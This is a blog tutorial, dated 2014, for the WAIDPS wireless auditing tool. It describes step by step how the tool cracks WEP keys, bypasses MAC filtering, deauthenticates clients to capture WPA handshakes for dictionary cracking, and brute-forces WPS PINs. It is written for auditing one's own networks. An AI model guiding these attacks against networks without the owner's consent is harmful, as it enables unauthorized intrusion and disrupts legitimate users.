Tuesday, June 24, 2014

WAIDPS [Wireless Auditing, Intrusion Detection & Prevention System] Tutorial / Explanations - Part 4


Network Cracking (Auditing) Module
WAIDPS also include with the Network auditing Module which allow user to crack a WEP encrypted access point (AP), capturing of WPA/WPA2 Handshake for cracking of WPA Passphase and also bruteforcing the PIN of a Wi-Fi Protected Setup (WPS) enabled router which thereafter revealing the WPA passphase. Apart from cracking of encrypted acess point, WAIDPS also include a “Live Monitoring” of Access Point which will show the detail of wireless clients associated to the specific Access Point.

WARNING : The Network Cracking Module is strictly for auditing your own network or mutual consent of auditing someone network. It is ILLEGAL to attack on someone access point and it is the user's responsibility to obey all applicable laws. Developer assumes no liability and is not responsible for any misuse of WAIDPS.

Network Auditing Main Menu
In order to get into the ‘Network Auditing’ selection menu, user can press [Enter] on the main menu followed by [A] to get into the auditing module. In the Auditing menu, it will display the list of detected access points sorted in the order of WEP, WPS enabled router, WPA Access Point with clients and WPA Access Point. To display more information on the operation, type [Help].

Note : Please allow the WiFi Harvester to harvest for access points and clients detail in the main screen before selecting the “Auditing Network” module.

Cracking of WEP Encrypted Access Point
WAIDPS allow user to crack a WEP encrypted access point with various attacking methods such as ARP replay, interactive ARP replay, Korek & Hirte attack (Developing). It also provide the options of deauthing existing clients and spoofing of MAC address. To select the target to attack, simply enter the number reflected or the MAC address of the Access Point (BSSID). User can also filter the encryption type by typing “WEP”.


 Once the target Access Point (AP) is selected, WAIDPS will display the existing AP/Clients detail and also information found on the database which was previously harvested by the “WiFi Harvester”. WAIDPS has also spoofed the MAC address of the attacking interface and also allowing user to spoof their MAC address.

After all information at set, WAIDPS will first attempt to associate with the AP by performing a “Fake Authentication” with the AP. After associated with the AP, WAIDPS will then continue with the default ARP Request Replay attacks. At the same time of attacking the AP, WAIDPS will also attempt to crack the WEP key after obtaining sufficient IVs. Once the WEP encryption is cracked, the WEP key is be displayed and stored in a database for reference.

Example of displaying of cracked Access Point in the Auditing main menu

Apart from the default ARP Request Replay attack mode, WAIDPS also provide other attacking mode such as interactive replay, KoreK Chopchop, Café Latte, Fragmentation and Hirte attack method (Not ready yet). User can enter the WEP Auditing Menu by press [Enter] during the attacking process. Other than the attack methods, in the WEP auditing menu, it also allow user to deauth clients, spoofing of attacking MAC address and also other method of cracking the WEP key.

Cracking of WEP Encrypted Access Point (Usage of previous captured IVs)
WAIDPS will also store the previously captured IVs for subsequent use in cracking of WEP key if user does not have enough time to crack the WEP key. These IVs dump will be added to the current IVs to increase the number of IVs for faster chance of cracking.
Cracking of WEP Encrypted Access Point (Beating MAC Filtered AP)
Some Access Point may have the MAC Filtering option turn on prevent unauthorized client from associating with the AP and also harden cracking of the encryption by newbie. WAIDPS will display error message of possible “MAC Filtered Access Point” if a MAC filtered AP is detected during the fake authentication process.

WAIDPS will provide user with the option of spoofing the existing client MAC address or MAC address found in database that was previously harvested. Simply press [Enter] to display the WEP Auditing Menu and select “4” - Spoof MAC Address to spoof the attacking interface MAC address.

Cracking of WEP Encrypted Access Point (Shared Key Authentication – SKA AP)
A “Shared Key Authentication” (SKA) WEP encrypted network is much more complex than the commonly used “Open” WEP network. WAIDPS will display error message reporting a possible SKA WEP encrypted access point. An existing legitimate client must be present in-order to obtain the 140 Bytes keysteam. User can manually send deauth signal to the AP trying to obtain the keysteam or WAIDPS will automatically attempt to send deauth signal in order to obtain the keysteam. To increase the chances of beating SKA, user can also spoof the existing client MAC address.

Cracking of WPA Encrypted Access Point
In order to crack the WPA encrypted access point, user must first obtain a 4-way handshake between the legitimated client and access point.  Similar the WEP cracking, WAIDPS will display the AP information and also allowing user to spoof MAC address before proceeding with the deauthentication of clients to obtain the handshakes.

WAIDPS will attempt to send broadcast deauthentication signal to the Access Point and attempt to detect connected clients. Once client is detected, WAIDPS will then proceed to send deauthentication signal to the specific client MAC address attempting to capture the handshake. Similar to WEP attack, user can display the list of options by pressing on [Enter] during the capturing process.

After sending deauthentication signal to the AP and clients, WAIDPS will detect the present of handshake and list out the detail individually by client MAC. Once a successful handshake is captured, the captured handshake file will be saved to “/SYWorks/Saved/” directory. WAIDPS will then proceed with the cracking of WPA passphase basing on the captured handshake detail.

If the passphase is found in the default dictionary, WAIDPS will then display the cracked passphase and also store into a database for reference.


Cracking of WPA Encrypted Access Point (Manually selecting handshake file)
If any existing handshake was captured on a specific access point, it will show “[Handshake]” directly behind the ESSID on the main auditing screen. User can then select the access point to perform a manual cracking of handshake file using other dictionary.

Customising Dictionary Location
User can specify the location of other dictionaries to be use for cracking by typing “C” – Application Configuration on the WAIDPS main menu, thereafter selecting “9” for Dictionary Detail and Setting.

Cracking of WPS Enabled Access Point
Cracking of WPS enabled access point option is only available for WPA/WPA2 encrypted network since WEP is consider to be easily cracked. Similar to the WEP/WPA cracking, user can enter the list number of the access point or MAC address of the AP (BSSID) to select the target. Options are provided for user to select whether to proceed with “WPS Bruteforce” or “WPA handshake”. Bruteforcing detail will be shown on the screen to enable user have a better analysis of the PIN tried, remain PINs and also other status of the bruteforcing process.

Once the WPS PIN is found, WAIDPS will display the WPS PIN and WPA Passphase of the cracked network and also store the detail into the database for reference.

Cracking of WPS Enabled Access Point (Manually entering PIN)
During the cracking process, user can also manually enter the WPS PIN to try by pressing on [Enter] to display the menu and then “P” to enter the PIN. This is particularly useful when the WPA passphase is changed but not the WPS PIN.

Live Monitoring of Access Point
WAIDPS also provide user with the option to perform a live monitoring of a Access Point to get the activities status of AP and wireless clients associated to the AP. It will display the detail of the detected devices and whether the devices are active or not sending any data. To monitor the specific access point, user can put a “M” infront of the listing number or “M” infront of the BSSID.

No comments: